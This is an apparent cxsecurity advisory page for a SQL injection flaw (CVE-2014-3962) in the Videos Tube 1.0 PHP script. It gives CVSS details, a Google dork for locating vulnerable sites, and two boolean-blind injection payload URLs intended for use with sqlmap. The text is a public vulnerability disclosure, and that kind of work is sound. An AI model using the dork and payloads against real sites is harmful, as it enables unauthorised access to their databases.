Videos Tube 1.0 SQL Injection

2014-05-31 / 2014-06-05
Credit: Mustafa ALTINKAYNAK
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2014-3962
CWE: CWE-89
Dork: inurl:\"single.php?url=\" video|


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Videos Tube SQL Injection and Remote Code Execution| |# Google Dork: inurl:"single.php?url=" video| |# Date: 05.05.2014| |# Exploit Author: Mustafa ALTINKAYNAK| |# Vendor Homepage: http://www.phpscriptlerim.com| |# Software Link: http://demo.phpscriptlerim.com/free/videostube/| |# Version: 1.0| |Description (Aklama)| |========================| |Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.| |Vulnerability| |========================| |1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)| |2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)| -- *Mustafa ALTINKAYNAK***


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top